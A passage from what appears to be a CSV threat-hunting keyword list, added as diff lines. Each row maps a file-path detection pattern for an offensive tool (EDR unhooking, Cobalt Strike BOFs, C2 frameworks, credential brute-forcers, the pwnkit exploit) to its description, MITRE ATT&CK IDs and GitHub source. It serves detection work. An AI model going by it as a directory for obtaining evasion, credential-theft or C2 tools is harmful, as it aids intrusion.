+"*/unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z"
+"*/unDefender.git*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z"
+"*/undertheradar.git*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - 
TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
+"*/unhook-bof*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z"
+"*/unhook-bof*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","1","N/A","10","10","240","61","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z"
+"*/unhook-bof*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/unhook-bof","1","1","N/A","10","10","51","14","2022-03-13T15:57:10Z","2021-07-02T14:55:38Z"
+"*/UnhookingPatch.git*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z"
+"*/unicorn.git*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z"
+"*/unicorn.py*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z"
+"*/unittest.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/unshackle.git*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z"
+"*/unshackle.modules*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z"
+"*/unused/locktest.sh*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/unused/Yosemite.patch*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/unusual-port.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/updog-*.tar.gz*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*/updog.git*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*/updog/archive/updog-*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*/upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/uptime-agent-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/url-snarf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/user_data/*/keylog.txt*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z"
+"*/userenum.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*/UserlandBypass/*.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*/username-anarchy*","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing.
Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","1","N/A","N/A","6","564","113","2022-01-26T18:34:02Z","2012-11-07T05:35:10Z"
+"*/UserNamespaceOverlayfsSetuidWriteExec/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/usniper.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/usr/bin/pkexec*","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","1","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z"
+"*/usr/bin/polenum*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*/usr/local/bin/exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/usr/local/pwndrop/*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z"
+"*/usr/share/cobaltstrike/*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z"
+"*/usr/share/wordlists/*.txt*","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/utils/addcomputer.py*","offensive_tool_keyword","sam-the-admin","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z"
+"*/utils/obfuscate.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/UTWOqVQ132/*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera -
APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
+"*/UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z"
+"*/vainject.c*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*/vajra/phishApp.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z"
+"*/var/lib/ptunnel*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*/var/log/exegol/*.log*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 -
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/veeam_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/Vegile.git*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z"
+"*/venom.git*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/venom.sh *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/venom/","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 -
T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/ventrilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/versant-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/viper.conf*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/viper.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135
- T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/viper.sln*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/viper/Docker/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/viper/Docker/nginxconfig/htpasswd*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 -
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/vipermsf*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*/viperpython*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/viperpython.git*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*/virtualenvs/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active
Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*/VirusTotalC2/*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z"
+"*/VisualBasicObfuscator*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z"
+"*/vmauthd-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/vmware_enum_*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads.
